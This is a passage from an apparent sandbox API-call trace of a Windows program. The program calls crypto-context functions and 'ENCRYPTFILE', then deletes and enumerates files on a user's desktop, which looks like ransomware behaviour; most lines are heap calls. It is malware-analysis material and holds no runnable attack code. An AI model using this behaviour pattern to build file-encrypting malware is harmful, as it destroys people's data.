lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0124.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0124.471] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0124.471] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0124.471] FreeLibrary (hLibModule=0x756e0000) returned 1 [0124.471] CloseHandle (hObject=0x258) returned 1 [0124.472] CloseHandle (hObject=0x2a0) returned 1 [0124.478] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\MDF9dFhi.gif", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\MDF9dFhi.gif", lpFilePart=0x0) returned 0x24 [0124.478] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MDF9dFhi.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\mdf9dfhi.gif")) returned 0x20 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0124.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0124.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0124.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0124.479] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\MDF9dFhi.gif", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x120f2ee0, ftCreationTime.dwHighDateTime=0x1d5e117, ftLastAccessTime.dwLowDateTime=0xd5a93410, ftLastAccessTime.dwHighDateTime=0x1d5e755, ftLastWriteTime.dwLowDateTime=0xd5a93410, ftLastWriteTime.dwHighDateTime=0x1d5e755, nFileSizeHigh=0x0, nFileSizeLow=0x6e44, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="MDF9dFhi.gif", cAlternateFileName="")) returned 0x41ac540 [0124.479] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MDF9dFhi.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\mdf9dfhi.gif")) returned 1 [0124.519] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x120f2ee0, ftCreationTime.dwHighDateTime=0x1d5e117, ftLastAccessTime.dwLowDateTime=0xd5a93410, ftLastAccessTime.dwHighDateTime=0x1d5e755, ftLastWriteTime.dwLowDateTime=0xd5a93410, ftLastWriteTime.dwHighDateTime=0x1d5e755, nFileSizeHigh=0x0, nFileSizeLow=0x6e44, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="MDF9dFhi.gif", cAlternateFileName="")) returned 0 [0124.519] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0124.520] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0124.520] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7b00 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0124.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0124.521] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0124.521] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0124.521] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0124.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0124.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0124.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0124.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0124.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0124.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0124.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0124.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0124.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0124.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0124.522] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0124.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0124.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0124.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0124.522] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0124.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0124.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0124.522] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\OD9hoNYV uW0IIj2du.bmp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14423090, ftCreationTime.dwHighDateTime=0x1d5e5ae, ftLastAccessTime.dwLowDateTime=0xf27c3430, ftLastAccessTime.dwHighDateTime=0x1d5e3cb, ftLastWriteTime.dwLowDateTime=0xf27c3430, ftLastWriteTime.dwHighDateTime=0x1d5e3cb, nFileSizeHigh=0x0, nFileSizeLow=0x86e3, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="OD9hoNYV uW0IIj2du.bmp", cAlternateFileName="OD9HON~1.BMP")) returned 0x41ac100 [0124.522] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0124.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0124.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0124.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0124.523] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0124.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0124.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0124.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cc8 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0124.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0124.523] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0124.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0124.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0124.524] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0124.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0124.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0124.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0124.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0124.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c98 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0124.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0124.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0124.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0124.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0124.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0124.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0124.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0124.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0124.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0124.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0124.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0124.526] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0124.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0124.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0124.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0124.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0124.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0124.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0124.527] 